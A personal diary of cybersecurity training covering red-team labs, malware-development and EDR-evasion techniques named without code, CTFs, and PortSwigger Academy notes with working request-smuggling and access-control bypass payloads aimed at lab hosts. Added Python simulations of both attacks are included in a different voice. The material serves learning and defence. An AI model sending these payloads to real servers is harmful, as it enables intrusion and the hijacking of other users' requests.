Daily diary
This is a collection of my daily adventures in cyber learning
24.10.2024
Malware development
- Spent all week trying to defeat Elastic EDR
- Today I DID IT
18.10.2024
RTO exam day 1
- Finished all machines
- Was fun
17.10.2024
Home lab setup
- Set up Elasticsearch and Kibana with Fleet Server and EDR
16.10.2024
RTO
- Played around with Cobalt Strike, exam prep
15.10.2024
Malware development
- Created a stager using Local Mapping Injection method
Red Team Ops
- Played around with bypassing defender with UAC-bypasses
14.10.2024
Malware development
- Created a stager using Early Bird APC method
13.10.2024
Malware development
- Thread-hijacking stager
- APC-injection stager
12.10.2024
Malware development
- Setup Dev environment
- Made basic template for a stager which uses AES and Base64 to avoid AV
11.10.2024
RTO
- Setup PortBender and SOCKS proxy via Cobalt Strike
10.10.2024
Off day
- Played around with friends new WooCommerce store
9.10.2024
Lazy day
- Played around with Active Directory Certificate Services on RTO
8.10.2024
Burp Suite
- Got exam result (passed)
- Active Directory on RTO
7.10.2024
RTO
- Cobalt Strike
- Created a custom CNA
6.10.2024
RTO
- Got another month on RTO labs
- Antivirus evasion with Cobalt Strike
- Mostly a refresher
5.10.2024
Huntress CTF
- Did one of the most useless challenges to date
HTB Academy
- Started Advanced Deserialization Attacks module
- Dotnet deserialization vulns
4.10.2024
Burpsuite exam
- Got all the solutions, waiting for the final result, should pass unless something weird happens
Huntress CTF
- Some bullshit challenges this time around
3.10.2024
Huntress CTF!
- Some log analysis, nothing interesting
- Did some dynamic analysis on a powershell script via procmon
2.10.2024
Huntress CTF !
- Some phishing, nothing really exciting here
1.10.2024
Huntress CTF!
- jse file decrypting!
- can be done with https://github.com/sstraw/scrdec
- UPDATE: Even better! Use CyberChef!!!
30.9.2024
Burpsuite Academy
- Random labs here and there
29.9.2024
Burpsuite Academy
- Some mystery boxes, tried SQL injection via burp
28.9.2024
Burpsuite Academy
Practice exam
- Did another practice exam
- Did not pass on time again (had some breaks, was very close on first try even with breaks)
- Second try managed to solve it in very little time
XSS practice
- Did some labs to practice XSS filter evasion
27.9.2024
Burpsuite academy
- Did practice exam and some mystery boxes
- Failed on time, managed to solve it on second try
- Need to focus more on filter evasion
26.9.2024
BurpSuite Academy
Access Control
- Nothing really new here, good refresher
- Some headers to try to bypass restricted routes:
X-Original-URL
X-Rewrite-URL
E.g.
GET / HTTP/2
Host: 0a3600fd0451e51281233422003600f9.web-security-academy.net
X-Original-Url: /admin
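Why the header trick works, as an added example (not from the Burp Academy labs or the diary author): a toy proxy that blocks /admin by looking only at the request-line path, in front of an application that lets a client-supplied X-Original-URL / X-Rewrite-URL header replace the routed path. The same code also shows the hardened behaviour (the application ignores the override headers). Hostnames, route names and request lines are constructed.

```python
"""Added example (not from the Burp Academy labs or the diary author): a toy
proxy plus back-end showing why X-Original-URL / X-Rewrite-URL get past a
path-based block, next to the hardened behaviour.  Route names, hostnames
and the request lines are constructed."""

OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")
BLOCKED_PREFIX = "/admin"


def parse_request(raw: str):
    """Return (method, path, headers) from a raw HTTP/1.1 request; header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def proxy_allows(path: str) -> bool:
    """Access control at the front-end: decided only from the request-line path."""
    return not path.startswith(BLOCKED_PREFIX)


def backend_path(headers: dict, path: str, trust_overrides: bool) -> str:
    """Path the application routes on.  With trust_overrides=True a client-supplied
    override header replaces the URL (the behaviour that makes the bypass work);
    with False the application routes on the request line only (hardened)."""
    if trust_overrides:
        for name in OVERRIDE_HEADERS:
            if name in headers:
                return headers[name]
    return path


def handle(raw: str, trust_overrides: bool) -> str:
    """Proxy check, then application routing; returns which handler answered."""
    _method, path, headers = parse_request(raw)
    if not proxy_allows(path):
        return "forbidden"                      # direct GET /admin dies here
    routed = backend_path(headers, path, trust_overrides)
    return "admin" if routed.startswith(BLOCKED_PREFIX) else "public"


def probes(host: str, target: str = "/admin") -> list:
    """Requests to try once the direct path returns 403: the request line stays on
    an allowed path and the wanted path moves into each override header."""
    return [f"GET / HTTP/1.1\r\nHost: {host}\r\n{name}: {target}\r\n\r\n"
            for name in ("X-Original-URL", "X-Rewrite-URL")]
```

The proxy never sees /admin in the request line, so its check passes; the application then routes on the header. The fix is the same either way: strip the override headers at the proxy or make the application ignore them, so access control and routing look at the same path.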
Cache flaws
- Same here, HTB EasterBunny taught me well on the cache things!
- One random trick: language cookies can also be cached; rarely, but sometimes
25.9.2024
Burpsuite Academy
Request smuggling
Tried to understand how this vuln actually works
1) CL.TE
The front-end server decides where the request ends from the Content-Length header; the back-end uses Transfer-Encoding: chunked instead.
To detect it, send one request whose Content-Length covers the whole body (the chunked part plus the smuggled request), while the chunked encoding terminates early with a 0-length chunk. The front-end forwards everything as one request; the back-end stops at the 0 chunk and treats the leftover bytes as the start of the next request on the connection.
Example (CRLF line endings, blank lines matter):
POST / HTTP/1.1
Host: 0aff002304fcf3238029800a00c400e7.web-security-academy.net
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x
Here, Content-Length: 49 covers everything after the blank line that ends the headers. The chunk size is e (14 in decimal), exactly the length of "q=smuggling&x=", and the 0 chunk ends the chunked body. The front-end uses CL, so it forwards the whole thing as a single request; the back-end uses TE, so it answers the chunked POST and leaves "GET /404 HTTP/1.1 / Foo: x" sitting in the connection, waiting for the rest of that request. The next request on that connection (ours or another user's) is glued onto "Foo: x" and completes it, so whoever sent it gets a 404 because /404 does not exist.
2) TE.CL
- This works in reverse. The front-end uses the Transfer-Encoding header and the back-end uses Content-Length. We send a request with a small Content-Length value and put the smuggled request inside the chunked body.
Example (CRLF line endings, blank lines matter):
POST / HTTP/1.1
Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

9e
GET /404 HTTP/1.1
Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

Here, Content-Length: 4 covers only the chunk-size line "9e" plus its CRLF, i.e. the bytes just before the smuggled GET. The chunk size 9e (158 in decimal) covers the whole smuggled request, from "GET /404" through the blank line to "x=". Since the front-end uses TE, it reads through the 0 chunk and forwards everything as one request. The back-end uses CL, so it stops after "9e", answers the POST, and treats "GET /404 ..." as the next request. That request declares Content-Length: 144 but only "x=" has arrived, so the back-end waits and swallows the start of the next request on the connection as the rest of the body; that user then gets the 404. In Burp Repeater, turn off "Update Content-Length" for these, otherwise Burp rewrites the 4 and 49 for you.
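To see the two desyncs without a lab, here is an added example (not from the Burp Academy labs or the diary author): a toy front-end and back-end that cut the same byte stream into requests by different rules, one honouring Content-Length and the other Transfer-Encoding: chunked. It rebuilds both probes from the notes above (so the 49, the e, the 4 and the 9e come out of the length arithmetic rather than being typed in), then shows what each side sees and what a victim's follow-up request turns into. The victim request is constructed; HOST is the lab hostname from the TE.CL example.

```python
"""Added example (not from the Burp Academy labs or the diary author): a toy
front-end and back-end that split the same byte stream into requests by
different rules, Content-Length (CL) or Transfer-Encoding: chunked (TE),
reproducing the CL.TE and TE.CL probes from the notes above.  The victim
request is constructed; HOST is the lab hostname from the TE.CL example."""
import re

CRLF = b"\r\n"
SEP = CRLF + CRLF
HOST = b"0ae600f6039234d480b2d0de00e0009e.web-security-academy.net"
CL_RE = re.compile(rb"(?im)^content-length:[ \t]*(\d+)[ \t]*\r?$")
TE_RE = re.compile(rb"(?im)^transfer-encoding:[ \t]*chunked[ \t]*\r?$")


def chunked(data: bytes) -> bytes:
    """One chunk (hex size line, data, CRLF) followed by the 0-chunk terminator."""
    return f"{len(data):x}".encode() + CRLF + data + CRLF + b"0" + SEP


def build_clte(smuggled: bytes, prefix: bytes = b"q=smuggling&x=") -> bytes:
    """CL.TE probe as in the notes: Content-Length covers the whole body, the
    chunk covers only `prefix` (0xe = 14 bytes), `smuggled` follows the 0-chunk."""
    body = chunked(prefix) + smuggled
    return (b"POST / HTTP/1.1" + CRLF + b"Host: " + HOST + CRLF
            + b"Content-Length: " + str(len(body)).encode() + CRLF
            + b"Transfer-Encoding: chunked" + SEP + body)


def build_tecl(smuggled_head: bytes, smuggled_body: bytes) -> bytes:
    """TE.CL probe: the chunk carries the smuggled request, and Content-Length
    covers only the chunk-size line ("9e" + CRLF = 4 bytes in the notes)."""
    body = chunked(smuggled_head + SEP + smuggled_body)
    size_line_len = body.index(CRLF) + 2
    return (b"POST / HTTP/1.1" + CRLF + b"Host: " + HOST + CRLF
            + b"Content-Type: application/x-www-form-urlencoded" + CRLF
            + b"Content-Length: " + str(size_line_len).encode() + CRLF
            + b"Transfer-Encoding: chunked" + SEP + body)


def chunked_body_len(rest: bytes):
    """Bytes a chunked body occupies at the start of `rest`; None if it is cut
    short (a real server would block waiting for more data)."""
    pos = 0
    while True:
        eol = rest.find(CRLF, pos)
        if eol < 0:
            return None
        size = int(rest[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return pos + 2                              # empty line ends the body
        pos += size + 2                                 # chunk data plus its CRLF


def split_stream(stream: bytes, honour_te: bool):
    """Cut `stream` into requests.  honour_te=True models a server that uses
    Transfer-Encoding when present, False one that only trusts Content-Length.
    Returns (complete_requests, bytes still waiting to be completed)."""
    complete = []
    while True:
        head, sep, rest = stream.partition(SEP)
        if not sep:
            return complete, stream                     # header block unfinished
        if honour_te and TE_RE.search(head):
            n = chunked_body_len(rest)
        else:
            m = CL_RE.search(head)
            n = int(m.group(1)) if m else 0
        if n is None or len(rest) < n:
            return complete, stream                     # body short: blocks
        complete.append(head + sep + rest[:n])
        stream = rest[n:]


def demo() -> dict:
    victim = b"GET / HTTP/1.1" + CRLF + b"Host: " + HOST + SEP  # next user's request

    clte = build_clte(b"GET /404 HTTP/1.1" + CRLF + b"Foo: x")
    fe_done, fe_left = split_stream(clte, honour_te=False)      # front-end: CL
    be_done, be_left = split_stream(clte, honour_te=True)       # back-end: TE
    poisoned, _ = split_stream(be_left + victim, honour_te=True)  # victim completes it

    smuggled_head = (b"GET /404 HTTP/1.1" + CRLF + b"Host: " + HOST + CRLF
                     + b"Content-Type: application/x-www-form-urlencoded" + CRLF
                     + b"Content-Length: 144")
    tecl = build_tecl(smuggled_head, b"x=")
    te_fe_done, te_fe_left = split_stream(tecl, honour_te=True)   # front-end: TE
    te_be_done, te_be_left = split_stream(tecl, honour_te=False)  # back-end: CL

    return {
        "clte_cl": clte.split(CRLF)[2],                 # Content-Length header sent
        "clte_front": (len(fe_done), fe_left),          # one request, nothing left
        "clte_back": (len(be_done), be_left),           # "GET /404 ..." left pending
        "clte_victim_sees": poisoned[0].split(CRLF)[0], # request line served to victim
        "tecl_cl": tecl.split(CRLF)[3],
        "tecl_chunk_size": tecl.split(SEP, 1)[1].split(CRLF)[0],
        "tecl_front": (len(te_fe_done), te_fe_left),
        "tecl_back": (len(te_be_done), te_be_left[:17]),
    }
```

Run demo() and compare the two sides: for CL.TE the front-end sees one complete request and nothing left over, while the back-end leaves "GET /404 HTTP/1.1 / Foo: x" pending and the victim's request line becomes GET /404; for TE.CL the back-end stops after the 4-byte "9e" line and then sits on the smuggled GET waiting for 144 body bytes. Real servers differ in how they pick between the two headers (obfuscated TE values, duplicate headers), which is what the TE.TE variants in the Academy play with.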
24.9.2024
Browsed through BurpSuite Academy
Logic bugs
Nothing major, just a reminder to always try the unintended application flow: send unexpected or intentionally missing parameters, and skip steps where possible (don't follow redirects etc.).
E.g. with numbers use negative or very big numbers; with strings use very long strings.
Some basic deserialization
Nothing new, nice reminder of mostly PHP deserialization vulnerabilities
Nice caveat: in PHP 7 and earlier, loosely comparing the number zero to a non-numeric string always returns true, because the string is cast to int (0) before comparing. PHP 8 changed this: the number is compared as a string instead, so 0 == "test" is false. E.g.
if(0 == "test") {echo "???";}  // prints on PHP < 8, not on PHP 8